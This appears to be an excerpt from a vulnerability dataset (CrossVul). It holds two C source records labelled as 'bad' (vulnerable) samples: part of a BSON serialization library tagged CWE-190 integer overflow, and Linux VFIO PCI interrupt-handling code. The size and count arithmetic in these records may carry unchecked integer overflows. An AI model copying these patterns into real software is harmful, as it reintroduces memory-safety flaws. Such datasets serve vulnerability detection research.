? bson_iterator_int_raw( i ) - 4
: bson_iterator_int_raw( i );
}
MONGO_EXPORT char bson_iterator_bin_type( const bson_iterator *i ) {
return bson_iterator_value( i )[4];
}
MONGO_EXPORT const char *bson_iterator_bin_data( const bson_iterator *i ) {
return ( bson_iterator_bin_type( i ) == BSON_BIN_BINARY_OLD )
? bson_iterator_value( i ) + 9
: bson_iterator_value( i ) + 5;
}
MONGO_EXPORT const char *bson_iterator_regex( const bson_iterator *i ) {
return bson_iterator_value( i );
}
MONGO_EXPORT const char *bson_iterator_regex_opts( const bson_iterator *i ) {
const char *p = bson_iterator_value( i );
return p + strlen( p ) + 1;
}
MONGO_EXPORT void bson_iterator_subobject( const bson_iterator *i, bson *sub ) {
bson_init_data( sub, ( char * )bson_iterator_value( i ) );
_bson_reset( sub );
sub->finished = 1;
}
MONGO_EXPORT void bson_iterator_subiterator( const bson_iterator *i, bson_iterator *sub ) {
bson_iterator_from_buffer( sub, bson_iterator_value( i ) );
}
/* ----------------------------
BUILDING
------------------------------ */
static void _bson_init_size( bson *b, int size ) {
if( size == 0 )
b->data = NULL;
else
b->data = ( char * )bson_malloc( size );
b->dataSize = size;
b->cur = b->data + 4;
_bson_reset( b );
}
MONGO_EXPORT void bson_init( bson *b ) {
_bson_init_size( b, initialBufferSize );
}
void bson_init_size( bson *b, int size ) {
_bson_init_size( b, size );
}
static void bson_append_byte( bson *b, char c ) {
b->cur[0] = c;
b->cur++;
}
static void bson_append( bson *b, const void *data, int len ) {
memcpy( b->cur , data , len );
b->cur += len;
}
static void bson_append32( bson *b, const void *data ) {
bson_little_endian32( b->cur, data );
b->cur += 4;
}
static void bson_append64( bson *b, const void *data ) {
bson_little_endian64( b->cur, data );
b->cur += 8;
}
int bson_ensure_space( bson *b, const int bytesNeeded ) {
int pos = b->cur - b->data;
char *orig = b->data;
int new_size;
if ( pos + bytesNeeded <= b->dataSize )
return BSON_OK;
new_size = 1.5 * ( b->dataSize + bytesNeeded );
if( new_size < b->dataSize ) {
if( ( b->dataSize + bytesNeeded ) < INT_MAX )
new_size = INT_MAX;
else {
b->err = BSON_SIZE_OVERFLOW;
return BSON_ERROR;
}
}
b->data = bson_realloc( b->data, new_size );
if ( !b->data )
bson_fatal_msg( !!b->data, "realloc() failed" );
b->dataSize = new_size;
b->cur += b->data - orig;
return BSON_OK;
}
MONGO_EXPORT int bson_finish( bson *b ) {
int i;
if( b->err & BSON_NOT_UTF8 )
return BSON_ERROR;
if ( ! b->finished ) {
if ( bson_ensure_space( b, 1 ) == BSON_ERROR ) return BSON_ERROR;
bson_append_byte( b, 0 );
i = b->cur - b->data;
bson_little_endian32( b->data, &i );
b->finished = 1;
}
return BSON_OK;
}
MONGO_EXPORT void bson_destroy( bson *b ) {
if (b) {
bson_free( b->data );
b->err = 0;
b->data = 0;
b->cur = 0;
b->finished = 1;
}
}
static int bson_append_estart( bson *b, int type, const char *name, const int dataSize ) {
const int len = strlen( name ) + 1;
if ( b->finished ) {
b->err |= BSON_ALREADY_FINISHED;
return BSON_ERROR;
}
if ( bson_ensure_space( b, 1 + len + dataSize ) == BSON_ERROR ) {
return BSON_ERROR;
}
if( bson_check_field_name( b, ( const char * )name, len - 1 ) == BSON_ERROR ) {
bson_builder_error( b );
return BSON_ERROR;
}
bson_append_byte( b, ( char )type );
bson_append( b, name, len );
return BSON_OK;
}
/* ----------------------------
BUILDING TYPES
------------------------------ */
MONGO_EXPORT int bson_append_int( bson *b, const char *name, const int i ) {
if ( bson_append_estart( b, BSON_INT, name, 4 ) == BSON_ERROR )
return BSON_ERROR;
bson_append32( b , &i );
return BSON_OK;
}
MONGO_EXPORT int bson_append_long( bson *b, const char *name, const int64_t i ) {
if ( bson_append_estart( b , BSON_LONG, name, 8 ) == BSON_ERROR )
return BSON_ERROR;
bson_append64( b , &i );
return BSON_OK;
}
MONGO_EXPORT int bson_append_double( bson *b, const char *name, const double d ) {
if ( bson_append_estart( b, BSON_DOUBLE, name, 8 ) == BSON_ERROR )
return BSON_ERROR;
bson_append64( b , &d );
return BSON_OK;
}
MONGO_EXPORT int bson_append_bool( bson *b, const char *name, const bson_bool_t i ) {
if ( bson_append_estart( b, BSON_BOOL, name, 1 ) == BSON_ERROR )
return BSON_ERROR;
bson_append_byte( b , i != 0 );
return BSON_OK;
}
MONGO_EXPORT int bson_append_null( bson *b, const char *name ) {
if ( bson_append_estart( b , BSON_NULL, name, 0 ) == BSON_ERROR )
return BSON_ERROR;
return BSON_OK;
}
MONGO_EXPORT int bson_append_undefined( bson *b, const char *name ) {
if ( bson_append_estart( b, BSON_UNDEFINED, name, 0 ) == BSON_ERROR )
return BSON_ERROR;
return BSON_OK;
}
static int bson_append_string_base( bson *b, const char *name,
const char *value, int len, bson_type type ) {
int sl = len + 1;
if ( bson_check_string( b, ( const char * )value, sl - 1 ) == BSON_ERROR )
return BSON_ERROR;
if ( bson_append_estart( b, type, name, 4 + sl ) == BSON_ERROR ) {
return BSON_ERROR;
}
bson_append32( b , &sl );
bson_append( b , value , sl - 1 );
bson_append( b , "\0" , 1 );
return BSON_OK;
}
MONGO_EXPORT int bson_append_string( bson *b, const char *name, const char *value ) {
return bson_append_string_base( b, name, value, strlen ( value ), BSON_STRING );
}
MONGO_EXPORT int bson_append_symbol( bson *b, const char *name, const char *value ) {
return bson_append_string_base( b, name, value, strlen ( value ), BSON_SYMBOL );
}
MONGO_EXPORT int bson_append_code( bson *b, const char *name, const char *value ) {
return bson_append_string_base( b, name, value, strlen ( value ), BSON_CODE );
}
MONGO_EXPORT int bson_append_string_n( bson *b, const char *name, const char *value, int len ) {
return bson_append_string_base( b, name, value, len, BSON_STRING );
}
MONGO_EXPORT int bson_append_symbol_n( bson *b, const char *name, const char *value, int len ) {
return bson_append_string_base( b, name, value, len, BSON_SYMBOL );
}
MONGO_EXPORT int bson_append_code_n( bson *b, const char *name, const char *value, int len ) {
return bson_append_string_base( b, name, value, len, BSON_CODE );
}
MONGO_EXPORT int bson_append_code_w_scope_n( bson *b, const char *name,
const char *code, int len, const bson *scope ) {
int sl, size;
if ( !scope ) return BSON_ERROR;
sl = len + 1;
size = 4 + 4 + sl + bson_size( scope );
if ( bson_append_estart( b, BSON_CODEWSCOPE, name, size ) == BSON_ERROR )
return BSON_ERROR;
bson_append32( b, &size );
bson_append32( b, &sl );
bson_append( b, code, sl );
bson_append( b, scope->data, bson_size( scope ) );
return BSON_OK;
}
MONGO_EXPORT int bson_append_code_w_scope( bson *b, const char *name, const char *code, const bson *scope ) {
return bson_append_code_w_scope_n( b, name, code, strlen ( code ), scope );
}
MONGO_EXPORT int bson_append_binary( bson *b, const char *name, char type, const char *str, int len ) {
if ( type == BSON_BIN_BINARY_OLD ) {
int subtwolen = len + 4;
if ( bson_append_estart( b, BSON_BINDATA, name, 4+1+4+len ) == BSON_ERROR )
return BSON_ERROR;
bson_append32( b, &subtwolen );
bson_append_byte( b, type );
bson_append32( b, &len );
bson_append( b, str, len );
}
else {
if ( bson_append_estart( b, BSON_BINDATA, name, 4+1+len ) == BSON_ERROR )
return BSON_ERROR;
bson_append32( b, &len );
bson_append_byte( b, type );
bson_append( b, str, len );
}
return BSON_OK;
}
MONGO_EXPORT int bson_append_oid( bson *b, const char *name, const bson_oid_t *oid ) {
if ( bson_append_estart( b, BSON_OID, name, 12 ) == BSON_ERROR )
return BSON_ERROR;
bson_append( b , oid , 12 );
return BSON_OK;
}
MONGO_EXPORT int bson_append_new_oid( bson *b, const char *name ) {
bson_oid_t oid;
bson_oid_gen( &oid );
return bson_append_oid( b, name, &oid );
}
MONGO_EXPORT int bson_append_regex( bson *b, const char *name, const char *pattern, const char *opts ) {
const int plen = strlen( pattern )+1;
const int olen = strlen( opts )+1;
if ( bson_append_estart( b, BSON_REGEX, name, plen + olen ) == BSON_ERROR )
return BSON_ERROR;
if ( bson_check_string( b, pattern, plen - 1 ) == BSON_ERROR )
return BSON_ERROR;
bson_append( b , pattern , plen );
bson_append( b , opts , olen );
return BSON_OK;
}
MONGO_EXPORT int bson_append_bson( bson *b, const char *name, const bson *bson ) {
if ( !bson ) return BSON_ERROR;
if ( bson_append_estart( b, BSON_OBJECT, name, bson_size( bson ) ) == BSON_ERROR )
return BSON_ERROR;
bson_append( b , bson->data , bson_size( bson ) );
return BSON_OK;
}
MONGO_EXPORT int bson_append_element( bson *b, const char *name_or_null, const bson_iterator *elem ) {
bson_iterator next = *elem;
int size;
bson_iterator_next( &next );
size = next.cur - elem->cur;
if ( name_or_null == NULL ) {
if( bson_ensure_space( b, size ) == BSON_ERROR )
return BSON_ERROR;
bson_append( b, elem->cur, size );
}
else {
int data_size = size - 2 - strlen( bson_iterator_key( elem ) );
bson_append_estart( b, elem->cur[0], name_or_null, data_size );
bson_append( b, bson_iterator_value( elem ), data_size );
}
return BSON_OK;
}
MONGO_EXPORT int bson_append_timestamp( bson *b, const char *name, bson_timestamp_t *ts ) {
if ( bson_append_estart( b, BSON_TIMESTAMP, name, 8 ) == BSON_ERROR ) return BSON_ERROR;
bson_append32( b , &( ts->i ) );
bson_append32( b , &( ts->t ) );
return BSON_OK;
}
MONGO_EXPORT int bson_append_timestamp2( bson *b, const char *name, int time, int increment ) {
if ( bson_append_estart( b, BSON_TIMESTAMP, name, 8 ) == BSON_ERROR ) return BSON_ERROR;
bson_append32( b , &increment );
bson_append32( b , &time );
return BSON_OK;
}
MONGO_EXPORT int bson_append_date( bson *b, const char *name, bson_date_t millis ) {
if ( bson_append_estart( b, BSON_DATE, name, 8 ) == BSON_ERROR ) return BSON_ERROR;
bson_append64( b , &millis );
return BSON_OK;
}
MONGO_EXPORT int bson_append_time_t( bson *b, const char *name, time_t secs ) {
return bson_append_date( b, name, ( bson_date_t )secs * 1000 );
}
MONGO_EXPORT int bson_append_start_object( bson *b, const char *name ) {
if ( bson_append_estart( b, BSON_OBJECT, name, 5 ) == BSON_ERROR ) return BSON_ERROR;
b->stack[ b->stackPos++ ] = b->cur - b->data;
bson_append32( b , &zero );
return BSON_OK;
}
MONGO_EXPORT int bson_append_start_array( bson *b, const char *name ) {
if ( bson_append_estart( b, BSON_ARRAY, name, 5 ) == BSON_ERROR ) return BSON_ERROR;
b->stack[ b->stackPos++ ] = b->cur - b->data;
bson_append32( b , &zero );
return BSON_OK;
}
MONGO_EXPORT int bson_append_finish_object( bson *b ) {
char *start;
int i;
if ( bson_ensure_space( b, 1 ) == BSON_ERROR ) return BSON_ERROR;
bson_append_byte( b , 0 );
start = b->data + b->stack[ --b->stackPos ];
i = b->cur - start;
bson_little_endian32( start, &i );
return BSON_OK;
}
MONGO_EXPORT double bson_int64_to_double( int64_t i64 ) {
return (double)i64;
}
MONGO_EXPORT int bson_append_finish_array( bson *b ) {
return bson_append_finish_object( b );
}
/* Error handling and allocators. */
static bson_err_handler err_handler = NULL;
MONGO_EXPORT bson_err_handler set_bson_err_handler( bson_err_handler func ) {
bson_err_handler old = err_handler;
err_handler = func;
return old;
}
MONGO_EXPORT void bson_free( void *ptr ) {
bson_free_func( ptr );
}
MONGO_EXPORT void *bson_malloc( int size ) {
void *p;
p = bson_malloc_func( size );
bson_fatal_msg( !!p, "malloc() failed" );
return p;
}
void *bson_realloc( void *ptr, int size ) {
void *p;
p = bson_realloc_func( ptr, size );
bson_fatal_msg( !!p, "realloc() failed" );
return p;
}
int _bson_errprintf( const char *format, ... ) {
va_list ap;
int ret = 0;
va_start( ap, format );
#ifndef R_SAFETY_NET
ret = vfprintf( stderr, format, ap );
#endif
va_end( ap );
return ret;
}
/**
* This method is invoked when a non-fatal bson error is encountered.
* Calls the error handler if available.
*
* @param
*/
void bson_builder_error( bson *b ) {
if( err_handler )
err_handler( "BSON error." );
}
void bson_fatal( int ok ) {
bson_fatal_msg( ok, "" );
}
void bson_fatal_msg( int ok , const char *msg ) {
if ( ok )
return;
if ( err_handler ) {
err_handler( msg );
}
#ifndef R_SAFETY_NET
bson_errprintf( "error: %s\n" , msg );
exit( -5 );
#endif
}
/* Efficiently copy an integer to a string. */
extern const char bson_numstrs[1000][4];
void bson_numstr( char *str, int i ) {
if( i < 1000 )
memcpy( str, bson_numstrs[i], 4 );
else
bson_sprintf( str,"%d", i );
}
MONGO_EXPORT void bson_swap_endian64( void *outp, const void *inp ) {
const char *in = ( const char * )inp;
char *out = ( char * )outp;
out[0] = in[7];
out[1] = in[6];
out[2] = in[5];
out[3] = in[4];
out[4] = in[3];
out[5] = in[2];
out[6] = in[1];
out[7] = in[0];
}
MONGO_EXPORT void bson_swap_endian32( void *outp, const void *inp ) {
const char *in = ( const char * )inp;
char *out = ( char * )outp;
out[0] = in[3];
out[1] = in[2];
out[2] = in[1];
out[3] = in[0];
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_3983_1 |
crossvul-cpp_data_bad_5375_1 | /*
* VFIO PCI interrupt handling
*
* Copyright (C) 2012 Red Hat, Inc. All rights reserved.
* Author: Alex Williamson <alex.williamson@redhat.com>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* Derived from original vfio:
* Copyright 2010 Cisco Systems, Inc. All rights reserved.
* Author: Tom Lyon, pugs@cisco.com
*/
#include <linux/device.h>
#include <linux/interrupt.h>
#include <linux/eventfd.h>
#include <linux/msi.h>
#include <linux/pci.h>
#include <linux/file.h>
#include <linux/vfio.h>
#include <linux/wait.h>
#include <linux/slab.h>
#include "vfio_pci_private.h"
/*
* INTx
*/
static void vfio_send_intx_eventfd(void *opaque, void *unused)
{
struct vfio_pci_device *vdev = opaque;
if (likely(is_intx(vdev) && !vdev->virq_disabled))
eventfd_signal(vdev->ctx[0].trigger, 1);
}
void vfio_pci_intx_mask(struct vfio_pci_device *vdev)
{
struct pci_dev *pdev = vdev->pdev;
unsigned long flags;
spin_lock_irqsave(&vdev->irqlock, flags);
/*
* Masking can come from interrupt, ioctl, or config space
* via INTx disable. The latter means this can get called
* even when not using intx delivery. In this case, just
* try to have the physical bit follow the virtual bit.
*/
if (unlikely(!is_intx(vdev))) {
if (vdev->pci_2_3)
pci_intx(pdev, 0);
} else if (!vdev->ctx[0].masked) {
/*
* Can't use check_and_mask here because we always want to
* mask, not just when something is pending.
*/
if (vdev->pci_2_3)
pci_intx(pdev, 0);
else
disable_irq_nosync(pdev->irq);
vdev->ctx[0].masked = true;
}
spin_unlock_irqrestore(&vdev->irqlock, flags);
}
/*
* If this is triggered by an eventfd, we can't call eventfd_signal
* or else we'll deadlock on the eventfd wait queue. Return >0 when
* a signal is necessary, which can then be handled via a work queue
* or directly depending on the caller.
*/
static int vfio_pci_intx_unmask_handler(void *opaque, void *unused)
{
struct vfio_pci_device *vdev = opaque;
struct pci_dev *pdev = vdev->pdev;
unsigned long flags;
int ret = 0;
spin_lock_irqsave(&vdev->irqlock, flags);
/*
* Unmasking comes from ioctl or config, so again, have the
* physical bit follow the virtual even when not using INTx.
*/
if (unlikely(!is_intx(vdev))) {
if (vdev->pci_2_3)
pci_intx(pdev, 1);
} else if (vdev->ctx[0].masked && !vdev->virq_disabled) {
/*
* A pending interrupt here would immediately trigger,
* but we can avoid that overhead by just re-sending
* the interrupt to the user.
*/
if (vdev->pci_2_3) {
if (!pci_check_and_unmask_intx(pdev))
ret = 1;
} else
enable_irq(pdev->irq);
vdev->ctx[0].masked = (ret > 0);
}
spin_unlock_irqrestore(&vdev->irqlock, flags);
return ret;
}
void vfio_pci_intx_unmask(struct vfio_pci_device *vdev)
{
if (vfio_pci_intx_unmask_handler(vdev, NULL) > 0)
vfio_send_intx_eventfd(vdev, NULL);
}
static irqreturn_t vfio_intx_handler(int irq, void *dev_id)
{
struct vfio_pci_device *vdev = dev_id;
unsigned long flags;
int ret = IRQ_NONE;
spin_lock_irqsave(&vdev->irqlock, flags);
if (!vdev->pci_2_3) {
disable_irq_nosync(vdev->pdev->irq);
vdev->ctx[0].masked = true;
ret = IRQ_HANDLED;
} else if (!vdev->ctx[0].masked && /* may be shared */
pci_check_and_mask_intx(vdev->pdev)) {
vdev->ctx[0].masked = true;
ret = IRQ_HANDLED;
}
spin_unlock_irqrestore(&vdev->irqlock, flags);
if (ret == IRQ_HANDLED)
vfio_send_intx_eventfd(vdev, NULL);
return ret;
}
static int vfio_intx_enable(struct vfio_pci_device *vdev)
{
if (!is_irq_none(vdev))
return -EINVAL;
if (!vdev->pdev->irq)
return -ENODEV;
vdev->ctx = kzalloc(sizeof(struct vfio_pci_irq_ctx), GFP_KERNEL);
if (!vdev->ctx)
return -ENOMEM;
vdev->num_ctx = 1;
/*
* If the virtual interrupt is masked, restore it. Devices
* supporting DisINTx can be masked at the hardware level
* here, non-PCI-2.3 devices will have to wait until the
* interrupt is enabled.
*/
vdev->ctx[0].masked = vdev->virq_disabled;
if (vdev->pci_2_3)
pci_intx(vdev->pdev, !vdev->ctx[0].masked);
vdev->irq_type = VFIO_PCI_INTX_IRQ_INDEX;
return 0;
}
static int vfio_intx_set_signal(struct vfio_pci_device *vdev, int fd)
{
struct pci_dev *pdev = vdev->pdev;
unsigned long irqflags = IRQF_SHARED;
struct eventfd_ctx *trigger;
unsigned long flags;
int ret;
if (vdev->ctx[0].trigger) {
free_irq(pdev->irq, vdev);
kfree(vdev->ctx[0].name);
eventfd_ctx_put(vdev->ctx[0].trigger);
vdev->ctx[0].trigger = NULL;
}
if (fd < 0) /* Disable only */
return 0;
vdev->ctx[0].name = kasprintf(GFP_KERNEL, "vfio-intx(%s)",
pci_name(pdev));
if (!vdev->ctx[0].name)
return -ENOMEM;
trigger = eventfd_ctx_fdget(fd);
if (IS_ERR(trigger)) {
kfree(vdev->ctx[0].name);
return PTR_ERR(trigger);
}
vdev->ctx[0].trigger = trigger;
if (!vdev->pci_2_3)
irqflags = 0;
ret = request_irq(pdev->irq, vfio_intx_handler,
irqflags, vdev->ctx[0].name, vdev);
if (ret) {
vdev->ctx[0].trigger = NULL;
kfree(vdev->ctx[0].name);
eventfd_ctx_put(trigger);
return ret;
}
/*
* INTx disable will stick across the new irq setup,
* disable_irq won't.
*/
spin_lock_irqsave(&vdev->irqlock, flags);
if (!vdev->pci_2_3 && vdev->ctx[0].masked)
disable_irq_nosync(pdev->irq);
spin_unlock_irqrestore(&vdev->irqlock, flags);
return 0;
}
static void vfio_intx_disable(struct vfio_pci_device *vdev)
{
vfio_virqfd_disable(&vdev->ctx[0].unmask);
vfio_virqfd_disable(&vdev->ctx[0].mask);
vfio_intx_set_signal(vdev, -1);
vdev->irq_type = VFIO_PCI_NUM_IRQS;
vdev->num_ctx = 0;
kfree(vdev->ctx);
}
/*
* MSI/MSI-X
*/
static irqreturn_t vfio_msihandler(int irq, void *arg)
{
struct eventfd_ctx *trigger = arg;
eventfd_signal(trigger, 1);
return IRQ_HANDLED;
}
static int vfio_msi_enable(struct vfio_pci_device *vdev, int nvec, bool msix)
{
struct pci_dev *pdev = vdev->pdev;
unsigned int flag = msix ? PCI_IRQ_MSIX : PCI_IRQ_MSI;
int ret;
if (!is_irq_none(vdev))
return -EINVAL;
vdev->ctx = kzalloc(nvec * sizeof(struct vfio_pci_irq_ctx), GFP_KERNEL);
if (!vdev->ctx)
return -ENOMEM;
/* return the number of supported vectors if we can't get all: */
ret = pci_alloc_irq_vectors(pdev, 1, nvec, flag);
if (ret < nvec) {
if (ret > 0)
pci_free_irq_vectors(pdev);
kfree(vdev->ctx);
return ret;
}
vdev->num_ctx = nvec;
vdev->irq_type = msix ? VFIO_PCI_MSIX_IRQ_INDEX :
VFIO_PCI_MSI_IRQ_INDEX;
if (!msix) {
/*
* Compute the virtual hardware field for max msi vectors -
* it is the log base 2 of the number of vectors.
*/
vdev->msi_qmax = fls(nvec * 2 - 1) - 1;
}
return 0;
}
static int vfio_msi_set_vector_signal(struct vfio_pci_device *vdev,
int vector, int fd, bool msix)
{
struct pci_dev *pdev = vdev->pdev;
struct eventfd_ctx *trigger;
int irq, ret;
if (vector < 0 || vector >= vdev->num_ctx)
return -EINVAL;
irq = pci_irq_vector(pdev, vector);
if (vdev->ctx[vector].trigger) {
free_irq(irq, vdev->ctx[vector].trigger);
irq_bypass_unregister_producer(&vdev->ctx[vector].producer);
kfree(vdev->ctx[vector].name);
eventfd_ctx_put(vdev->ctx[vector].trigger);
vdev->ctx[vector].trigger = NULL;
}
if (fd < 0)
return 0;
vdev->ctx[vector].name = kasprintf(GFP_KERNEL, "vfio-msi%s[%d](%s)",
msix ? "x" : "", vector,
pci_name(pdev));
if (!vdev->ctx[vector].name)
return -ENOMEM;
trigger = eventfd_ctx_fdget(fd);
if (IS_ERR(trigger)) {
kfree(vdev->ctx[vector].name);
return PTR_ERR(trigger);
}
/*
* The MSIx vector table resides in device memory which may be cleared
* via backdoor resets. We don't allow direct access to the vector
* table so even if a userspace driver attempts to save/restore around
* such a reset it would be unsuccessful. To avoid this, restore the
* cached value of the message prior to enabling.
*/
if (msix) {
struct msi_msg msg;
get_cached_msi_msg(irq, &msg);
pci_write_msi_msg(irq, &msg);
}
ret = request_irq(irq, vfio_msihandler, 0,
vdev->ctx[vector].name, trigger);
if (ret) {
kfree(vdev->ctx[vector].name);
eventfd_ctx_put(trigger);
return ret;
}
vdev->ctx[vector].producer.token = trigger;
vdev->ctx[vector].producer.irq = irq;
ret = irq_bypass_register_producer(&vdev->ctx[vector].producer);
if (unlikely(ret))
dev_info(&pdev->dev,
"irq bypass producer (token %p) registration fails: %d\n",
vdev->ctx[vector].producer.token, ret);
vdev->ctx[vector].trigger = trigger;
return 0;
}
static int vfio_msi_set_block(struct vfio_pci_device *vdev, unsigned start,
unsigned count, int32_t *fds, bool msix)
{
int i, j, ret = 0;
if (start >= vdev->num_ctx || start + count > vdev->num_ctx)
return -EINVAL;
for (i = 0, j = start; i < count && !ret; i++, j++) {
int fd = fds ? fds[i] : -1;
ret = vfio_msi_set_vector_signal(vdev, j, fd, msix);
}
if (ret) {
for (--j; j >= (int)start; j--)
vfio_msi_set_vector_signal(vdev, j, -1, msix);
}
return ret;
}
static void vfio_msi_disable(struct vfio_pci_device *vdev, bool msix)
{
struct pci_dev *pdev = vdev->pdev;
int i;
for (i = 0; i < vdev->num_ctx; i++) {
vfio_virqfd_disable(&vdev->ctx[i].unmask);
vfio_virqfd_disable(&vdev->ctx[i].mask);
}
vfio_msi_set_block(vdev, 0, vdev->num_ctx, NULL, msix);
pci_free_irq_vectors(pdev);
/*
* Both disable paths above use pci_intx_for_msi() to clear DisINTx
* via their shutdown paths. Restore for NoINTx devices.
*/
if (vdev->nointx)
pci_intx(pdev, 0);
vdev->irq_type = VFIO_PCI_NUM_IRQS;
vdev->num_ctx = 0;
kfree(vdev->ctx);
}
/*
* IOCTL support
*/
static int vfio_pci_set_intx_unmask(struct vfio_pci_device *vdev,
unsigned index, unsigned start,
unsigned count, uint32_t flags, void *data)
{
if (!is_intx(vdev) || start != 0 || count != 1)
return -EINVAL;
if (flags & VFIO_IRQ_SET_DATA_NONE) {
vfio_pci_intx_unmask(vdev);
} else if (flags & VFIO_IRQ_SET_DATA_BOOL) {
uint8_t unmask = *(uint8_t *)data;
if (unmask)
vfio_pci_intx_unmask(vdev);
} else if (flags & VFIO_IRQ_SET_DATA_EVENTFD) {
int32_t fd = *(int32_t *)data;
if (fd >= 0)
return vfio_virqfd_enable((void *) vdev,
vfio_pci_intx_unmask_handler,
vfio_send_intx_eventfd, NULL,
&vdev->ctx[0].unmask, fd);
vfio_virqfd_disable(&vdev->ctx[0].unmask);
}
return 0;
}
static int vfio_pci_set_intx_mask(struct vfio_pci_device *vdev,
unsigned index, unsigned start,
unsigned count, uint32_t flags, void *data)
{
if (!is_intx(vdev) || start != 0 || count != 1)
return -EINVAL;
if (flags & VFIO_IRQ_SET_DATA_NONE) {
vfio_pci_intx_mask(vdev);
} else if (flags & VFIO_IRQ_SET_DATA_BOOL) {
uint8_t mask = *(uint8_t *)data;
if (mask)
vfio_pci_intx_mask(vdev);
} else if (flags & VFIO_IRQ_SET_DATA_EVENTFD) {
return -ENOTTY; /* XXX implement me */
}
return 0;
}
static int vfio_pci_set_intx_trigger(struct vfio_pci_device *vdev,
unsigned index, unsigned start,
unsigned count, uint32_t flags, void *data)
{
if (is_intx(vdev) && !count && (flags & VFIO_IRQ_SET_DATA_NONE)) {
vfio_intx_disable(vdev);
return 0;
}
if (!(is_intx(vdev) || is_irq_none(vdev)) || start != 0 || count != 1)
return -EINVAL;
if (flags & VFIO_IRQ_SET_DATA_EVENTFD) {
int32_t fd = *(int32_t *)data;
int ret;
if (is_intx(vdev))
return vfio_intx_set_signal(vdev, fd);
ret = vfio_intx_enable(vdev);
if (ret)
return ret;
ret = vfio_intx_set_signal(vdev, fd);
if (ret)
vfio_intx_disable(vdev);
return ret;
}
if (!is_intx(vdev))
return -EINVAL;
if (flags & VFIO_IRQ_SET_DATA_NONE) {
vfio_send_intx_eventfd(vdev, NULL);
} else if (flags & VFIO_IRQ_SET_DATA_BOOL) {
uint8_t trigger = *(uint8_t *)data;
if (trigger)
vfio_send_intx_eventfd(vdev, NULL);
}
return 0;
}
static int vfio_pci_set_msi_trigger(struct vfio_pci_device *vdev,
unsigned index, unsigned start,
unsigned count, uint32_t flags, void *data)
{
int i;
bool msix = (index == VFIO_PCI_MSIX_IRQ_INDEX) ? true : false;
if (irq_is(vdev, index) && !count && (flags & VFIO_IRQ_SET_DATA_NONE)) {
vfio_msi_disable(vdev, msix);
return 0;
}
if (!(irq_is(vdev, index) || is_irq_none(vdev)))
return -EINVAL;
if (flags & VFIO_IRQ_SET_DATA_EVENTFD) {
int32_t *fds = data;
int ret;
if (vdev->irq_type == index)
return vfio_msi_set_block(vdev, start, count,
fds, msix);
ret = vfio_msi_enable(vdev, start + count, msix);
if (ret)
return ret;
ret = vfio_msi_set_block(vdev, start, count, fds, msix);
if (ret)
vfio_msi_disable(vdev, msix);
return ret;
}
if (!irq_is(vdev, index) || start + count > vdev->num_ctx)
return -EINVAL;
for (i = start; i < start + count; i++) {
if (!vdev->ctx[i].trigger)
continue;
if (flags & VFIO_IRQ_SET_DATA_NONE) {
eventfd_signal(vdev->ctx[i].trigger, 1);
} else if (flags & VFIO_IRQ_SET_DATA_BOOL) {
uint8_t *bools = data;
if (bools[i - start])
eventfd_signal(vdev->ctx[i].trigger, 1);
}
}
return 0;
}
static int vfio_pci_set_ctx_trigger_single(struct eventfd_ctx **ctx,
unsigned int count, uint32_t flags,
void *data)
{
/* DATA_NONE/DATA_BOOL enables loopback testing */
if (flags & VFIO_IRQ_SET_DATA_NONE) {
if (*ctx) {
if (count) {
eventfd_signal(*ctx, 1);
} else {
eventfd_ctx_put(*ctx);
*ctx = NULL;
}
return 0;
}
} else if (flags & VFIO_IRQ_SET_DATA_BOOL) {
uint8_t trigger;
if (!count)
return -EINVAL;
trigger = *(uint8_t *)data;
if (trigger && *ctx)
eventfd_signal(*ctx, 1);
return 0;
} else if (flags & VFIO_IRQ_SET_DATA_EVENTFD) {
int32_t fd;
if (!count)
return -EINVAL;
fd = *(int32_t *)data;
if (fd == -1) {
if (*ctx)
eventfd_ctx_put(*ctx);
*ctx = NULL;
} else if (fd >= 0) {
struct eventfd_ctx *efdctx;
efdctx = eventfd_ctx_fdget(fd);
if (IS_ERR(efdctx))
return PTR_ERR(efdctx);
if (*ctx)
eventfd_ctx_put(*ctx);
*ctx = efdctx;
}
return 0;
}
return -EINVAL;
}
static int vfio_pci_set_err_trigger(struct vfio_pci_device *vdev,
unsigned index, unsigned start,
unsigned count, uint32_t flags, void *data)
{
if (index != VFIO_PCI_ERR_IRQ_INDEX || start != 0 || count > 1)
return -EINVAL;
return vfio_pci_set_ctx_trigger_single(&vdev->err_trigger,
count, flags, data);
}
static int vfio_pci_set_req_trigger(struct vfio_pci_device *vdev,
unsigned index, unsigned start,
unsigned count, uint32_t flags, void *data)
{
if (index != VFIO_PCI_REQ_IRQ_INDEX || start != 0 || count > 1)
return -EINVAL;
return vfio_pci_set_ctx_trigger_single(&vdev->req_trigger,
count, flags, data);
}
int vfio_pci_set_irqs_ioctl(struct vfio_pci_device *vdev, uint32_t flags,
unsigned index, unsigned start, unsigned count,
void *data)
{
int (*func)(struct vfio_pci_device *vdev, unsigned index,
unsigned start, unsigned count, uint32_t flags,
void *data) = NULL;
switch (index) {
case VFIO_PCI_INTX_IRQ_INDEX:
switch (flags & VFIO_IRQ_SET_ACTION_TYPE_MASK) {
case VFIO_IRQ_SET_ACTION_MASK:
func = vfio_pci_set_intx_mask;
break;
case VFIO_IRQ_SET_ACTION_UNMASK:
func = vfio_pci_set_intx_unmask;
break;
case VFIO_IRQ_SET_ACTION_TRIGGER:
func = vfio_pci_set_intx_trigger;
break;
}
break;
case VFIO_PCI_MSI_IRQ_INDEX:
case VFIO_PCI_MSIX_IRQ_INDEX:
switch (flags & VFIO_IRQ_SET_ACTION_TYPE_MASK) {
case VFIO_IRQ_SET_ACTION_MASK:
case VFIO_IRQ_SET_ACTION_UNMASK:
/* XXX Need masking support exported */
break;
case VFIO_IRQ_SET_ACTION_TRIGGER:
func = vfio_pci_set_msi_trigger;
break;
}
break;
case VFIO_PCI_ERR_IRQ_INDEX:
switch (flags & VFIO_IRQ_SET_ACTION_TYPE_MASK) {
case VFIO_IRQ_SET_ACTION_TRIGGER:
if (pci_is_pcie(vdev->pdev))
func = vfio_pci_set_err_trigger;
break;
}
break;
case VFIO_PCI_REQ_IRQ_INDEX:
switch (flags & VFIO_IRQ_SET_ACTION_TYPE_MASK) {
case VFIO_IRQ_SET_ACTION_TRIGGER:
func = vfio_pci_set_req_trigger;
break;
}
break;
}
if (!func)
return -ENOTTY;
return func(vdev, index, start, count, flags, data);
}
